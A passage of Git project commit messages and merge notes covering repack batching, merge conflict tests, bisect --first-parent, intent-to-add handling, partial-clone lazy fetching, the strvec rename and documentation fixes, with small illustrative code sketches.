total expected size exceeds the batch-size or all pack-files are
considered. If there are at least two pack-files, then these are
combined to a new pack-file whose size should not be too much larger
than the batch-size.
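The selection rule can be sketched in Python as follows. The function select_packs() is hypothetical, and it assumes the packs are visited in the order given and that reaching the batch size exactly also stops the collection; neither detail is specified above.

```python
def select_packs(expected_sizes, batch_size):
    """Return the indices of packs to combine, or [] for no repack."""
    chosen, total = [], 0
    for index, size in enumerate(expected_sizes):
        if total >= batch_size:
            break                # enough has been collected
        if size >= batch_size:
            continue             # leave large pack-files alone
        chosen.append(index)
        total += size
    # Combining fewer than two pack-files would accomplish nothing.
    return chosen if len(chosen) >= 2 else []


print(select_packs([1000, 10, 20, 30], 50))  # small packs next to a big one
print(select_packs([1000, 10], 50))          # only one small pack
print(select_packs([10, 20, 30, 40], 25))    # stops once the total is reached
```

Note that a total below the batch size no longer prevents the repack; only the "at least two pack-files" requirement does.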
This new strategy should succeed in keeping the number of pack-files
small in these "medium" size repositories. The concern about churn is
likely not interesting, as the real control over that is the frequency
in which the repack command is run.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
2997178ee6 (upload-pack: split check_unreachable() in two, prep for
get_reachable_list(), 2016-06-12) moved most code of has_unreachable()
into the new function do_reachable_revlist(). The latter takes care to
ignore SIGPIPE during its operations, and restores the original signal
handler before returning.
However, a sigchain_pop(SIGPIPE) call remained in the error handling
code of has_unreachable(), which does nothing because the stack is
empty after do_reachable_revlist() cleaned up after itself. Remove it.
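Why the leftover call is a no-op can be seen in a toy Python model of a handler stack. The SigChain class is hypothetical and tracks a single signal; it only mirrors the push/pop behaviour described above and is not Git's sigchain code.

```python
class SigChain:
    """Toy stack of saved handlers for one signal."""

    def __init__(self, initial_handler):
        self.current = initial_handler
        self._saved = []

    def push(self, handler):
        self._saved.append(self.current)
        self.current = handler

    def pop(self):
        if not self._saved:
            return False  # empty stack: nothing to restore
        self.current = self._saved.pop()
        return True


chain = SigChain("default")
chain.push("ignore")        # the helper starts ignoring the signal
restored = chain.pop()      # the helper restores the handler before returning
leftover = chain.pop()      # the caller's extra pop finds an empty stack

print(restored, leftover, chain.current)
```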
Signed-off-by: René Scharfe <l.s.r@web.de>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
t6425 was very picky about the exact output message produced by a
rename/delete conflict, in a way that just scratches the surface of the
mess that was built into merge-recursive. The idea was that it would
try to find the possible combinations of different conflict types, and
when more than one was present for one path, it would try to provide a
combined message that covered all the cases.
There's a lot to unravel here...
First, there's a basic conflict type known as modify/delete, which is a
content conflict. It occurs when one side deletes a file, but the other
modifies it.
There is also a path conflict known as a rename/delete. This occurs
when one side deletes a path, and the other renames it. This is not a
content conflict, it is a path conflict. It will often occur in
combination with a content conflict, though, namely a modify/delete. As
such, these two were often combined.
Another type of conflict that can exist is a directory/file conflict.
For example, one side adds a new file at some path, and the other side
of history adds a directory at the same path. The path that was "added"
could have been put there by a rename, though. Thus, we have the
possibility of a single path being affected by a modify/delete, a
rename/delete, and a directory/file conflict.
In part, this was a natural by-product of merge-recursive's design.
Since it was doing a four way merge with the contents of the working
tree being the fourth factor it had to consider, it had working tree
handling spread all over the code. It also had directory/file conflict
handling spread everywhere through all the other types of conflicts.
And our testsuite has a huge number of directory/file conflict tests
because trying to get them right required modifying so many different
codepaths. A natural outgrowth of this kind of structure is conflict
messages that combine all the different types that the current codepath
is considering.
However, if we want to make the different conflict types orthogonal and
avoid repeating ourselves and getting very brittle code, then we need to
split the messages from these different conflict types apart. Besides,
trying to determine all possible permutations is a _royal_ mess. The
code to handle the rename/delete/directory/file conflict output is
already somewhat hard to parse, and is somewhat brittle. But if we
really wanted to go that route, then we'd have to have special handling
for the following types of combinations:
* rename/add/delete:
on the side of history that didn't rename the given file, remove the file
instead and place an unrelated file in the way of the rename
* rename/rename(2to1)/mode conflict/delete/delete:
two different files, one executable and the other not, are renamed
to the same location, each side deletes the source file that the
other side renames
* rename/rename(1to2)/add/add:
file renamed differently on each side of history, with each side
placing an unrelated file in the way of the other
* rename/rename(1to2)/content conflict/file location/(D/F)/(D/F)/:
both sides modify a file in conflicting way, both rename that file
but to different paths, one side renames the directory which the
other side had renamed that file into causing it to possibly need a
transitive rename, and each side puts a directory in the way of the
other's path.
Let's back away from this path of insanity, and allow the different
types of conflicts to be handled by separate pieces of non-repeated code
by allowing the conflict messages to be split into their separate types.
(If multiple conflict types affect a single path, the conflict messages
can be printed sequentially.) Start this path with a simple change:
modify this test to be more flexible and accept the output either merge
backend (recursive or the new ort) will produce.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Much like the last commit accepted 'add/add' and 'rename/add'
interchangeably, we also want to do the same for 'add/add' and
'rename/rename'. This also allows us to avoid the ambiguity in meaning
with 'rename/rename' (is it two separate files renamed to the same
location, or one file renamed on both sides but differently)?
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
merge-recursive treats an add/add conflict where one of the adds came
from a rename as a separate 'rename/add' type of conflict. However, if
there is no content conflict after the content merge(s), then the file
is not considered to be conflicted. That suggests the conflict type is
really just add/add. Other merge engines might choose to print messages
to the console that just refer to these as add/add conflicts; accept
both types of output.
Note: it could help to notify users if the three-way content merge of
the rename had content conflicts, because when we then go to two-way
merge THAT with the conflicting add we can get nested conflict markers.
merge-recursive, unfortunately, doesn't do that, but other merge engines
could.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
I had long since forgotten the idea behind this test and why it failed,
and took a little while to figure it out. To prevent others from having
to spend a similar time on it, add an explanation in the comments.
However, the reasoning in the explanation makes me question why I
considered it a failure at all. I'm not sure if I had a better reason
when I originally wrote it, but for now just add commentary about the
possible expectations and why it behaves the way it does right now.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This test had multiple issues causing it to fail for the wrong
reason(s):
* rename/rename(1to2) conflicts have always left the original source
path present in the working directory and index (at stage 1). Thus,
the triple rename/rename(1to2) should result in 9 unstaged files,
not 6.
* It messed up the three-way content merge for checking the results of
merging for one of the renames, accidentally turning it into a
two-way merge.
* It got the contents of the base files it was using to compare
against wrong, due to an off-by-one error, and overwrite-redirection
('>') instead of append-redirection ('>>').
* It used slightly too-long conflict markers.
* It didn't include filenames in the conflict marker hunks (granted,
that was a shortcoming of the merge-recursive backend for rename/add
and rename/rename(2to1) conflicts, but since it's
test_expect_failure anyway we might as well make it expect our
preferred behavior rather than some compromise that we can't yet
reach anyway).
Fix these issues so that a merge backend which correctly handles these
kinds of nested conflicts will pass the test.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Commit da1e295e00 ("t604[236]: do not run setup in separate tests",
2019-10-22) removed approximately half the tests (which were setup-only
tests) in t6043 by turning them into functions that the subsequent tests
would call as their first step. This ensured that any test from this
file could be run entirely independently of all the other tests in the
file. Unfortunately, the call to the new setup function was missed in
two of the test_expect_failure cases. Add them in.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Apparently I don't know how to count untracked files, and since the
tests in question were marked as test_expect_failure, no one ever
noticed it until now. Correct the count, as these tests clearly create
three untracked files ('out', 'err', and 'file_count').
(I believe this problem arose because earlier incarnations counted lines
via a pipe to 'wc -l'. Reviewers asked that it be replaced by writing
the output to a file and using test_line_count, but when the temporary
output was added to a separate file, the count of untracked files should
have increased.)
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The testcase only required that the merge complete without conflict,
without specifying what the correct resolution was. Since normalization
changed this from a modify/delete to a not-modified/delete, the correct
resolution is to have the file be removed at the end. Add a check for
this resolution.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The tests for the merge machinery are spread over several places.
Collect them into t64xx for simplicity. Some notes:
t60[234]*.sh:
Merge tests started in t602*, overgrew bisect and remote tracking
tests in t6030, t6040, and t6041, and nearly overtook replace tests
in t6050. This made picking out relevant tests that I wanted to run
in a tighter loop slightly more annoying for years.
t303*.sh:
These started out as tests for the 'merge-recursive' toplevel command,
but were not restricted to that and had lots of overlap with the
underlying merge machinery.
t7405, t7613:
submodule-specific merge logic started out in submodule.c but was
moved to merge-recursive.c in commit 18cfc08866 ("submodule.c: move
submodule merging to merge-recursive.c", 2018-05-15). Since these
tests are about the logic found in the merge machinery, moving these
tests to be with the merge tests makes sense.
t7607, t7609:
Having tests spread all over the place makes it more likely that
additional tests related to a certain piece of logic grow in all those
other places. Much like t303*.sh, these two tests were about the
underlying merge machinery rather than outer levels.
Tests that were NOT moved:
t76[01]*.sh:
Other than the four tests mentioned above, the remaining tests in
t76[01]*.sh are related to non-recursive merge strategies, parameter
parsing, and other stuff associated with the highlevel builtin/merge.c
rather than the recursive merge machinery.
t3[45]*.sh:
The rebase testcases in t34*.sh also test the merge logic pretty
heavily; sometimes changes I make only trigger failures in the rebase
tests. The rebase tests are already nicely coupled together, though,
and I didn't want to mess that up. Similar comments apply for the
cherry-pick tests in t35*.sh.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In `stop_progress()`, we're careful to check that `p_progress` is
non-NULL before we dereference it, but by then we have already
dereferenced it when calling `finish_if_sparse(*p_progress)`. And, for
what it's worth, we'll go on to blindly dereference it again inside
`stop_progress_msg()`.
We could return early if we get a NULL-pointer, but let's go one step
further and BUG instead. The progress API handles NULL just fine, but
that's the NULL-ness of `*p_progress`, e.g., when running with
`--no-progress`. If `p_progress` is NULL, chances are that's a mistake.
For symmetry, let's do the same check in `stop_progress_msg()`, too.
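A minimal sketch of the two levels of NULL-ness discussed above. The names `sketch_progress` and `sketch_stop_progress()` are made up for illustration and are not the progress API itself; the abort() call merely stands in for BUG().

```c
#include <stdio.h>
#include <stdlib.h>

/* Hypothetical stand-in for the real progress struct. */
struct sketch_progress {
	int done;
};

static void sketch_stop_progress(struct sketch_progress **p_progress)
{
	/* A NULL pointer-to-pointer is a caller mistake: fail loudly. */
	if (!p_progress) {
		fprintf(stderr, "BUG: called with a NULL address\n");
		abort();
	}

	/* A NULL progress is legitimate, e.g. progress was disabled. */
	if (!*p_progress)
		return;

	(*p_progress)->done = 1;
	*p_progress = NULL;
}
```

Checking `p_progress` before the first dereference is the point; the original code performed the check only after `*p_progress` had already been read.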
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Update "git help guides" documentation organization.
* pb/guide-docs:
git.txt: add list of guides
Documentation: don't hardcode command categories twice
help: drop usage of 'common' and 'useful' for guides
command-list.txt: add missing 'gitcredentials' and 'gitremote-helpers'
All "mergy" operations that internally use the merge-recursive
machinery should honor the merge.renormalize configuration, but
many of them didn't.
* en/eol-attrs-gotchas:
checkout: support renormalization with checkout -m <paths>
merge: make merge.renormalize work for all uses of merge machinery
t6038: remove problematic test
t6038: make tests fail for the right reason
Small fixes and workarounds.
* jk/compiler-fixes-and-workarounds:
revision: avoid leak when preparing bloom filter for "/"
revision: avoid out-of-bounds read/write on empty pathspec
config: work around gcc-10 -Wstringop-overflow warning
Adjust tests in contrib/ to the recent change to fmt-merge-msg.
* es/adjust-subtree-test-for-merge-msg-update:
Revert "contrib: subtree: adjust test to change in fmt-merge-msg"
Code cleanup around "worktree" API implementation.
* es/worktree-cleanup:
worktree: retire special-case normalization of main worktree path
worktree: drop bogus and unnecessary path munging
worktree: drop unused code from get_linked_worktree()
worktree: drop pointless strbuf_release()
The argv_array API is useful for not just managing argv but any
"vector" (NULL-terminated array) of strings, and has seen adoption
to a certain degree. It has been renamed to "strvec" to reduce the
barrier to adoption.
* jk/strvec:
strvec: rename struct fields
strvec: drop argv_array compatibility layer
strvec: update documention to avoid argv_array
strvec: fix indentation in renamed calls
strvec: convert remaining callers away from argv_array name
strvec: convert more callers away from argv_array name
strvec: convert builtin/ callers away from argv_array name
quote: rename sq_dequote_to_argv_array to mention strvec
strvec: rename files from argv-array to strvec
argv-array: rename to strvec
argv-array: use size_t for count and alloc
The purpose of "git init --separate-git-dir" is to separate the
repository from the worktree. This is true even when --separate-git-dir
is used on an existing worktree, in which case, it moves the .git/
subdirectory to a new location outside the worktree.
However, an outright bare repository (such as one created by "git init
--bare"), has no worktree, so using --separate-git-dir to separate it
from its non-existent worktree is nonsensical. Therefore, make it an
error to use --separate-git-dir on a bare repository.
Implementation note: "git init" considers a repository bare if told so
explicitly via --bare or if it guesses it to be so based upon
heuristics. In the explicit --bare case, a conflict with
--separate-git-dir is easy to detect early. In the guessed case,
however, the conflict can only be detected once "bareness" is guessed,
which happens after "git init" has begun creating the repository.
Technically, we can get by with a single late check which would cover
both cases; however, erroring out early, when possible, without leaving
detritus provides a better user experience.
Signed-off-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Under normal circumstances, if a test author misspells a filename passed
to test_cmp(), the error is quickly discovered when the test fails
unexpectedly due to test_cmp() being unable to find the file. However,
if the test is expected to fail, as with test_expect_failure(), a
misspelled filename as argument to test_cmp() will go unnoticed since
the test will indeed fail, but for the wrong reason. Make it easier for
test authors to discover such problems early by sanity-checking the
arguments to test_cmp(). To avoid penalizing all clients of test_cmp()
in the general case, only check for missing files if the comparison
fails.
While at it, make test_cmp_bin() sanity-check its arguments, as well.
Signed-off-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When creating "new file" diffs against i-t-a index entries, diff-lib
erroneously used the mode of the cache entry rather than the mode of the
file in the worktree. This changes run_diff_files() to correctly use the
mode of the worktree file in this case.
Signed-off-by: Raymond E. Pasco <ray@ameretat.dev>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
apply --cached (as used by add -p) should accept creation and deletion
patches to intent-to-add paths in the index. apply --index, however,
should always fail because an intent-to-add path never matches the
worktree (by definition).
Based-on-patch-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Raymond E. Pasco <ray@ameretat.dev>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
By definition, an intent-to-add index entry can never match the
worktree, because worktrees have no concept of intent-to-add entries.
Therefore, "apply --index" should always fail on intent-to-add paths.
Because check_preimage() calls verify_index_match(), it already fails
for patches other than creation patches, which check_preimage() ignores.
This patch adds a check to check_preimage()'s rough equivalent for
creation patches, check_to_create().
Helped-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Raymond E. Pasco <ray@ameretat.dev>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Now that find_bisection() accepts multiple boolean arguments, these may
be combined into a single unsigned integer in order to declutter some of
the code in bisect.c.
Also, rename the existing "flags" bitfield to "commit_flags", to
explicitly differentiate it from the new "bisect_flags" bitfield.
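As a rough illustration of folding several boolean parameters into one unsigned flags word, consider the sketch below. The names (`SKETCH_FIND_ALL`, `SKETCH_FIRST_PARENT_ONLY`, `sketch_count_options()`) are assumptions made for this example and may not match the identifiers used in bisect.c.

```c
/* Hypothetical flag bits, one per former boolean parameter. */
#define SKETCH_FIND_ALL          (1u << 0)
#define SKETCH_FIRST_PARENT_ONLY (1u << 1)

/*
 * Before: sketch_find(list, find_all, first_parent_only)
 * After:  sketch_find(list, bisect_flags)
 *
 * This helper only counts how many known options are set, to show
 * how a callee tests individual bits.
 */
static int sketch_count_options(unsigned bisect_flags)
{
	int n = 0;

	if (bisect_flags & SKETCH_FIND_ALL)
		n++;
	if (bisect_flags & SKETCH_FIRST_PARENT_ONLY)
		n++;
	return n;
}
```

A caller would combine options with bitwise OR, e.g. `sketch_count_options(SKETCH_FIND_ALL | SKETCH_FIRST_PARENT_ONLY)`, and adding a third option later does not change the function signature.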
Based-on-patch-by: Harald Nordgren <haraldnordgren@gmail.com>
Signed-off-by: Aaron Lipman <alipman88@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Upon seeing a merge commit when bisecting, this option may be used to
follow only the first parent.
In detecting regressions introduced through the merging of a branch, the
merge commit will be identified as the introduction of the bug and its
ancestors will be ignored.
This option is particularly useful in avoiding false positives when a
merged branch contained broken or non-buildable commits, but the merge
itself was OK.
Signed-off-by: Aaron Lipman <alipman88@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
cmd_bisect__helper() is intended as a temporary shim layer serving as an
interface for git-bisect.sh. This function and git-bisect.sh should
eventually be replaced by a C implementation, cmd_bisect(), serving as
an entrypoint for all "git bisect ..." shell commands: cmd_bisect() will
only parse the first token following "git bisect", and dispatch the
remaining args to the appropriate function ["bisect_start()",
"bisect_next()", etc.].
Thus, cmd_bisect__helper() should not be responsible for parsing flags
like --no-checkout. Instead, let the --no-checkout flag remain in the
argv array, so it may be evaluated alongside the other options already
parsed by bisect_start().
Signed-off-by: Aaron Lipman <alipman88@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add first_parent_only parameter to find_bisection(), removing the
barrier that prevented combining the --bisect and --first-parent flags
when using git rev-list.
Based-on-patch-by: Tiago Botelho <tiagonbotelho@hotmail.com>
Signed-off-by: Aaron Lipman <alipman88@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Enforce consistent styling for tests on "git bisect run":
- Use "write_script" to abstract away platform-specific details.
- Favor current whitespace conventions.
- While at it, change "introduced" to "added" in the comments to make
them read better.
Helped-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Aaron Lipman <alipman88@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In order to not repeatedly search for the reference-transaction hook in
case it's getting called multiple times, we use a caching mechanism to
only call `find_hook()` once. What was missed though is that the return
value of `find_hook()` actually comes from a static strbuf, which means
it will get overwritten when calling `find_hook()` again. As a result,
we may call the wrong hook with parameters of the reference-transaction
hook.
This scenario was spotted in the wild when executing a git-push(1) with
multiple references, where there are interleaving calls to both the
update and the reference-transaction hook. While initial calls to the
reference-transaction hook work as expected, it will stop working after
the next invocation of the update hook. The result is that we now start
calling the update hook with parameters and stdin of the
reference-transaction hook.
This commit fixes the issue by storing a copy of `find_hook()`'s return
value in the cache.
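The failure mode can be reproduced in isolation. In the sketch below, `sketch_find_hook()` is a made-up stand-in that returns a pointer into a static buffer (a plain char array rather than a strbuf); the two cache helpers are likewise hypothetical and only illustrate the difference between caching the pointer and caching a copy.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Stand-in for a lookup that returns a pointer into a static buffer,
 * so each call overwrites the result of the previous one.
 */
static const char *sketch_find_hook(const char *name)
{
	static char path[64];

	snprintf(path, sizeof(path), "hooks/%s", name);
	return path;
}

/* Buggy cache: remembers the pointer, not the contents. */
static const char *sketch_cached_hook_buggy(void)
{
	static const char *cached;

	if (!cached)
		cached = sketch_find_hook("reference-transaction");
	return cached;
}

/* Fixed cache: keeps its own copy of the string. */
static const char *sketch_cached_hook_fixed(void)
{
	static char *cached;

	if (!cached) {
		const char *found = sketch_find_hook("reference-transaction");

		cached = malloc(strlen(found) + 1);
		if (!cached)
			abort();
		strcpy(cached, found);
	}
	return cached;
}
```

Once some other caller looks up a different hook, the buggy cache silently points at that hook's path, while the fixed cache still holds the reference-transaction path.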
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A Git client may produce a "remote error:" message (along with whatever
error the other side sent us) in two places:
- when we see an ERR packet
- when we're using a sideband and see sideband 3
We can't reliably translate the message the other side sent us, but we
can do so for our own prefix. However, we translate only the ERR-packet
case but not the sideband-3 case. Let's make them consistent (by marking
both for translation).
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When there is no need to run a specific function on certain platforms,
we often #define an empty function to swallow its parameters and
make it into a no-op, e.g.
#define precompose_argv(c,v) /* no-op */
While this guarantees that no unneeded code is generated, it also
discards type and other checks on these parameters. For example, code
written with the argv-array API (diff_args is of type "struct
argv_array" that has .argc and .argv members):
precompose_argv(diff_args.argc, diff_args.argv);
must be updated to use "struct strvec diff_args" with .nr and .v
members, like so:
precompose_argv(diff_args.nr, diff_args.v);
after the argv-array API has been updated to the strvec API.
However, the "no-op" C preprocessor macro is too aggressive in
discarding what is unused, and did not catch such a call that was left
unconverted.
Using a "static inline" function whose body is a no-op should still
result in the same binary with decent compilers yet catch such a
reference to a missing field or passing a value of a wrong type.
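To make the difference concrete, here is a small sketch. All names in it (`sketch_noop_macro`, `sketch_noop_inline`, `struct sketch_vec`) are invented for illustration; the struct is a simplified stand-in and not the real strvec definition.

```c
/*
 * Macro version: the arguments vanish during preprocessing, so even
 * a reference to a nonexistent struct member compiles.
 */
#define sketch_noop_macro(c, v) /* no-op */

/*
 * Inline version: the body is still empty, but the compiler checks
 * that the arguments exist and have compatible types.
 */
static inline void sketch_noop_inline(int argc, const char **argv)
{
	(void)argc;
	(void)argv;
}

/* Simplified stand-in with .nr and .v members only. */
struct sketch_vec {
	const char **v;
	int nr;
};

static int sketch_call_sites(struct sketch_vec *args)
{
	/* Compiles even though the struct has no .argc or .argv. */
	sketch_noop_macro(args->argc, args->argv);

	/* Writing args->argc here instead would be a compile error. */
	sketch_noop_inline(args->nr, args->v);
	return args->nr;
}
```

With optimization enabled, a decent compiler is expected to emit nothing for the inline call, so the type checking comes at no runtime cost.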
While at it, I notice that precompose_str() has never been used
anywhere in the code, since it was introduced at 76759c7d (git on
Mac OS and precomposed unicode, 2012-07-08). Instead of turning it
into a static inline, just remove it.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Drop whitespace in the value of `$test_description` and in a test body
and use `test_write_lines`.
Stop defining `$u` with a trailing space just so that we can tuck it in
like `git foo $u$more...` and get minimal whitespace in the command:
`git foo $u $more...` is more readable at the "cost" of an empty `$u`
yielding `git foo something...`.
Finally, avoid using single quotes within the test scripts to repeatedly
close and reopen the quotes that wrap the test scripts (see the previous
commit). This "unnecessary" quoting does mean that the verbose test
output shows the interpolated values, i.e., the shell code we're
running. But the downside is that the source of the script does *not*
show the shell code we're eventually executing, leaving the reader to
reason about what we really do and whether there are any quoting issues.
(There aren't.)
Where we run through loops to generate several "identical but different"
tests, the test message contains the interpolated variables we're
looping on, meaning one can always identify exactly which instance has
failed, even if the verbose test output shows the exact same test body
several times.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In the test scripts, the recommended style is, e.g.:
test_expect_success 'name' '
	do-something somehow &&
	do-some-more testing
'
When using this style, any single quote in the multi-line test section
is actually closing the lone single quotes that surround it.
It can be a non-issue in practice:
test_expect_success 'sed a little' '
	sed -e 's/hi/lo/' in >out # "ok": no whitespace in s/hi/lo/
'
Or it can be a bug in the test, e.g., because variable interpolation
happens before the test even begins executing:
v=abc
test_expect_success 'variable interpolation' '
	v=def &&
	echo '"$v"' # abc
'
Change several such in-test single quotes to use double quotes instead
or, in a few cases, drop them altogether. These were identified using
some crude grepping. We're not fixing any test bugs here, but we're
hopefully making these tests slightly easier to grok and to maintain.
There are legitimate use cases for closing a quote and opening a new
one, e.g., both '\'' and '"'"' can be used to produce a literal single
quote. I'm not touching any of those here.
In t9401, tuck the redirecting ">" to the filename while we're touching
those lines.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
blame/annotate have supported --first-parent since commit 95a4fb0eac
("blame: handle --first-parent"). This adds a blurb on that option to
the documentation.
Signed-off-by: Raymond E. Pasco <ray@ameretat.dev>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
diff-files recently changed to treat changes to paths marked "intent to
add" in the index as new file diffs rather than diffs from the empty
blob. However, apply refuses to apply new file diffs on top of existing
index entries, except in the case of renames. This causes "git add -p",
which uses apply, to fail when attempting to stage hunks from a file
when intent to add has been recorded.
This changes the logic in check_to_create() which checks if an entry
already exists in an index in two ways: first, we only search for an
index entry at all if ok_if_exists is false; second, we check for the
CE_INTENT_TO_ADD flag on any index entries we find and allow the apply
to proceed if it is set.
Helped-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Raymond E. Pasco <ray@ameretat.dev>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
There is a call to has_object_file(), which lazily fetches missing
objects in a partial clone, when the object is known to not be
a promisor object. Change that call to has_object(), which does not do
any lazy fetching.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The options --missing=allow-{any,promisor} were introduced in caf3827e2f
("rev-list: add list-objects filtering support", 2017-11-22) with the
following note in the commit message:
This patch introduces handling of missing objects to help
debugging and development of the "partial clone" mechanism,
and once the mechanism is implemented, for a power user to
perform operations that are missing-object aware without
incurring the cost of checking if a missing link is expected.
The idea that these options are missing-object aware (and thus do not
need to lazily fetch objects, unlike unaware commands that assume that
all objects are present) is assumed in later commits such as 07ef3c6604
("fetch test: use more robust test for filtered objects", 2020-01-15).
However, the current implementations of these options use
has_object_file(), which indeed lazily fetches missing objects. Teach
these implementations not to do so. Also, update the documentation of
these options to be clearer.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When applying a binary patch, as an optimization, "apply" checks if the
postimage is already present. During this check, it is perfectly
expected for the postimage not to be present, so there is no need to
lazy-fetch missing objects. Teach "apply" not to lazy-fetch in this
case.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
There have been a few bugs wherein Git fetches missing objects whenever
the existence of an object is checked, even though it does not need to
perform such a fetch. To resolve these bugs, we could look at all the
places that has_object_file() (or a similar function) is used. As a
first step, introduce a new function has_object() that checks for the
existence of an object, with a default behavior of not fetching if the
object is missing and the repository is a partial clone. As we verify
each has_object_file() (or similar) usage, we can replace it with
has_object(), and we will know that we are done when we can delete
has_object_file() (and the other similar functions).
Also, the new function has_object() has more appropriate defaults:
besides not fetching, it also does not recheck packed storage.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The change in 6e9c4d408d ("git-cvsexportcommit: port to SHA-256",
2020-06-22) added the use of a temporary directory for the index.
However, the form we used doesn't work in versions of Perl before
5.10.1. For example, version 5.10.0 contains a version of File::Temp
from 2007 that doesn't contain "newdir".
In order to make the code work with 5.8.8, which we support, let's
change to use the static method "tempdir" with the argument "CLEANUP",
which provides the same behavior.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The tests added to t5616 in 6dd3456a8c (upload-pack.c: allow banning
certain object filter(s), 2020-08-03) can fail racily, but only with
GETTEXT_POISON enabled.
The tests in question look something like this:
test_must_fail ok=sigpipe git clone --filter=blob:none ... 2>err &&
grep "filter blob:none not supported" err
The remote upload-pack process writes that error message both as an ERR
packet and via a die() message. In theory we should see the
message twice in the "err" file. The client relays the message from the
packet to its stderr (with a "remote error:" prefix), and because this
is a local-system clone, upload-pack's stderr goes to the same place.
But because clone may be writing to the pipe when upload-pack calls
die(), it may get SIGPIPE and fail to relay the message. That's why we
need our "ok=sigpipe" trick. But our grep should still work reliably in
that case. Either:
- we got SIGPIPE on the client, which means upload-pack completed its
die(), and we'll see that version of the message.
- the client didn't get SIGPIPE, and so it successfully relays the
message.
In theory we'd see both copies of the message in the second case. But
not always! As soon as the client sees ERR, it exits and we run grep.
But we have no guarantee that the upload-pack process has exited at this
point, or even written its die() message. We might only see the client
version of the message.
Normally that's OK. We only need to see one or the other to pass the
test. But now consider GETTEXT_POISON. upload-pack doesn't translate the
die() message nor the ERR packet. But once the client receives it, it
calls:
die(_("remote error: %s"), buffer + 4);
That message _is_ marked for translation. Normally we'd just replace the
"remote error:" portion of it, but in GETTEXT_POISON mode, we replace
the whole thing with "# GETTEXT POISON #" and don't include the "%s"
part at all. So the whole text from the ERR packet is dropped, and so we
may racily see a test failure if upload-pack's die() call wasn't yet
written.
We can fix it by using test_i18ngrep, which just makes this grep a noop
in the poison mode.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Not all man5/man7 guides are mentioned in the 'git(1)' documentation,
which makes the missing ones somewhat hard to find.
Add a list of the guides to git(1) by leveraging the existing
`Documentation/cmd-list.perl` script to generate a file `cmds-guide.txt`
which gets included in git.txt.
Also, do not hard-code the manual section '1'. Instead, use a regex so
that the manual section is discovered from the first line of each
`git*.txt` file.
This addition was hinted at in 1b81d8cb19 (help: use command-list.txt
for the source of guides, 2018-05-20).
Helped-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Instead of hard-coding the list of command categories in both
`Documentation/Makefile` and `Documentation/cmd-list.perl`, make the
Makefile the authoritative source and tweak `cmd-list.perl` so that it
receives the list of command categories as argument.
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Since 1b81d8cb19 (help: use command-list.txt for the source of guides,
2018-05-20), all man5/man7 guides listed in command-list.txt appear in
the output of 'git help -g'.
However, 'git help -g' still prefixes this list with "The common Git
guides are:", which makes one wonder if there are others!
In the same spirit, the man page for 'git help' describes the '--guides'
option as listing 'useful' guides, which is not false per se but can
also be taken to mean that there are other guides that exist but are not
useful.
Instead of 'common' and 'useful', use 'Git concept guides' in both
places. To keep the code in line with this change, rename
